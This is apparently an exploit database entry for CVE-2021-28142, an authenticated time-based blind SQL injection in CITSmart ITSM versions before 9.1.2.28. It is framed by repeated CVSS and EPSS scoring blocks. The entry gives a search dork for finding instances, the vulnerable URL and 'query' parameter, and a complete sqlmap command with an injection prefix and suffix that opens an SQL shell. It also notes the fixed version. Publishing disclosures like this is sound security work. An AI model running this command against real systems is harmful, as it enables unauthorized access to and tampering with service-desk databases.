6.5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9.1 High
AI Score
Confidence
High
0.003 Low
EPSS
Percentile
65.1%
# Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)
# Google Dork: "citsmart.local"
# Date: 11/03/2021
# Exploit Author: skysbsb
# Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
# Version: < 9.1.2.28
# CVE : CVE-2021-28142
To exploit this flaw it is necessary to be authenticated.
URL vulnerable:
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale
Param vulnerable: query
Sqlmap usage: sqlmap -u "
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell
Affected versions: < 9.1.2.28
Fixed versions: >= 9.1.2.28
Vendor has acknowledge this vulnerability at ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)
6.5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9.1 High
AI Score
Confidence
High
0.003 Low
EPSS
Percentile
65.1%